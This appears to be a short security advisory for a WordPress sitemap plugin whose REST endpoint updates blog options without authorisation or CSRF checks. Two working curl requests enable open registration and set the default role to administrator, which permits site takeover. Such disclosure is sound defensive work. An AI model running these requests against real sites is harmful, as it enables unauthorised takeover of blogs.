The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.
Allow user registrations:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
-H 'Content-Type: application/json' \
--data '{"users_can_register": 1}'
Set the default user role to administrator:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
-H 'Content-Type: application/json' \
--data '{"default_role":"administrator"}'